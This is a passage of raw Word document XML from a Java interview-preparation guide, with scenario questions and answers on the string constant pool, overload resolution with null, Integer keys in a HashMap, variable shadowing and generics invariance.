    </w:p>
    <w:p w14:paraId="22E66B18" w14:textId="532858B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w:t>
      </w:r>
      <w:r w:rsidR="00EC00CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Notes</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA74F3B" w14:textId="6B8634A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o handle 1000 TPS with a 100-thread pool, I’d use bounded queues with backpressure, optimize pool size, or switch to async processing and scale horizontally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399790A2" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00000000" w:rsidP="00B758F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="695147EB">
          <v:rect id="_x0000_i1886" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52955DF7" w14:textId="23B2E32E" w:rsidR="000753D5" w:rsidRPr="00CE4B95" w:rsidRDefault="000753D5" w:rsidP="00B758F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="045E0065" w14:textId="0FB78DE1" w:rsidR="00A82ACE" w:rsidRPr="00CE4B95" w:rsidRDefault="00A82ACE" w:rsidP="00A82ACE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="314" w:name="_Toc197867528"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Scenario based Questions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="314"/>
    </w:p>
    <w:p w14:paraId="6A770A19" w14:textId="77777777" w:rsidR="00A920A9" w:rsidRPr="00CE4B95" w:rsidRDefault="00A920A9" w:rsidP="00A82ACE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9EECAA"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5" w:name="_Toc197867529"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Scenario based question - 1?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="315"/>
    </w:p>
    <w:p w14:paraId="17E9FFA4"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String s1 = “abc”; and String s2 = new String(“abc”); Where will s1 and s2 be stored?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DD3F4D" w14:textId="659BC240"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case of the two String declarations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD215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1 = "abc";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7EC11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2 = new String("abc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC30EC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Where will s1 and s2 be stored?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321B1707"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 = "abc":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F317F"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The string "abc" is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>literal</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. In Java, string literals are stored in a special memory area called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also known as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Constant Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Intern Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2AB9B0"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the string "abc" is not already present in the pool, it is added. If it's already there, then s1 will point to the same string object in the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B228BFF"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 = new String("abc"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2761A79B"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Here, new String("abc") creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new string object</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the new keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6867A36C"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string literal "abc" is first looked up in the string pool, and if it's not already present, it's added. Then, new String("abc") creates a new String object in the heap, which is not part of the string pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF55653"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o, s2 points to a new String object on the heap, which contains the same value "abc" as the string in the pool, but they are not the same object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDA42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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8FBC64"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w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will point to a string in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interned string).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3B4011"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w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will point to a new </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String object on the heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, created explicitly using the new keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121589D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ven though both s1 and s2 contain the same string value ("abc"), they point to different memory locations. Specifically, s1 points to the string pool, while s2 points to a new object in the heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE3FA3D" w14:textId="5E8B8CED" w:rsidR="00FB246C" w:rsidRPr="00CE4B95"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87" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4FE94D"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6" w:name="_Toc197867530"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Scenario based question - 2?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="316"/>
    </w:p>
    <w:p w14:paraId="16B60FEF" w14:textId="77777777" w:rsidR="00F02018" w:rsidRPr="00CE4B95" w:rsidRDefault="00F02018" w:rsidP="00F02018">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">       What is the output of the given Java code?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618DF8F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p>
    <w:p w14:paraId="1E9453C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3B5FA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02D1C9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ADB1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metho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B86333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6842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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BF160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5BD038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bject method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3E1F7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4A4A7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661855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4E9BDDD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teger method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9B1F1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05350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73D80C" w14:textId="5CB8FF9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given code, the method(null) is called. Java will attempt to resolve the method call by checking the method signatures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59341AA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ere's the breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF04247"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method(Object o) and method(Integer i) are both overloaded methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222B790F"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null can be assigned to both Object and Integer because null is a valid value for any reference type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CFF110"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wever, Java prefers the most specific method. Integer is a subclass of Object, so method(Integer i) is more specific than method(Object o).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5FF0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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD159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Java compiler will choose the method(Integer i) because it is more specific than method(Object o), as Integer is a subclass of Object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762323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us, the output of the code will be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D27A53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method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDF9CCF" w14:textId="392EA569"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0279291">
          <v:rect id="_x0000_i1888" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7420453E"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7" w:name="_Toc197867531"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Scenario based question - 3?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="317"/>
    </w:p>
    <w:p w14:paraId="150D482C"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is the output?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399682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E0BAE31"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126651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390114A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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7981F05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Global"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EEC66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4B3D195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2019E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131D3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03696AD6" w14:textId="0287CEF1"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s break this down step by step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E34339F"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Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AD52D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p&lt;Integer, String&gt; aMap = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4FA5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a = new Integer(20);      // creates a new Integer object explicitly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598EC27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b = 20;                   // autoboxing, uses Integer.valueOf(20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C79B4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a (20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089C241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b (also 20), this will overwrite previous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69227760" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4A8D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20));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493532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new Integer(20)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E8801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b));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86966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a));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084488B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mportant Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483CCCA3"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HashMap uses hashCode() and equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to compare keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8356FD"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overrides both hashCode() and equals(), so two Integer objects with the same value are considered equal for map keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAD1694"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oth a and b have the value 20, so inserting b will </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overwrite</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the value associated with a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27481079"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Therefore:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACAA3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20 -&gt; "Blume"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050B5CB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20 -&gt; "BlumeGlobal" (overwrites previous)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF0DD08"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All get() calls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C3BBE"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20) → "BlumeGlobal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6CDEEF"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new Integer(20)) → "BlumeGlobal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB15ADB"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b) → "BlumeGlobal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F749D7"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a) → "BlumeGlobal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D8A57B"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67513A9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3240D98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7CE66F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2F526E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4446E1DC" w14:textId="394739B1"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89" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0210B88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8" w:name="_Toc197867532"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Scenario based question - 4?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="318"/>
    </w:p>
    <w:p w14:paraId="5682BA6D"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Modify below code in order to print the value of a and b?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7036BCB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 xml:space="preserve">Account </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF2B68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405087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6C5D824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Data</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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B2CCA"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76D2235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76A19D6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120AD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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBEE16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2EDB06B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239E48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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A62107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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D50F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Accoun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ccount</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B7B0A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ata</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6C00D50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Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F8552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FE70E8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B2A5D0" w14:textId="5D9E0488"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You're encountering a classic issue of </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>variable shadowing</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the method parameters a and b are shadowing the instance variables a and b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698FD7D4"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To fix this, you should use this keyword to refer to the instance variables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E57D3D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 Account {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A674B5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a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C2B0E3"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b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5308AB3D" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9E148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etData(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186894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a = a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014D943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b = b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183C65B1"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6015EB00" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E5511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howData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6447F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A = " + a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A283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B = " + b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D56DE5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89C8733" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47FB6F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static void main(String args[]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140338A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Account obj = new Account();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA194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etData(2, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D425B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howData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB7145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6948FB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5C5B5E23"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3837570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A = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1394F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B = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1046C29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 me know if you want an explanation of why this is necessary here!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16461A91" w14:textId="2F121D3F"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90" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E98BE19" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB487C" w:rsidP="00AF4D54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C6504A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19" w:name="_Toc197867533"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Scenario based question - 5?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="319"/>
    </w:p>
    <w:p w14:paraId="1A6F2E0B"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will happen if we declare the list below?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36460D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p>
    <w:p w14:paraId="7E0E267F" w14:textId="0457900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line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE7C28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Object&gt; var = new ArrayList&lt;String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791FBB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will </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not compile</w:t>
      </w:r>
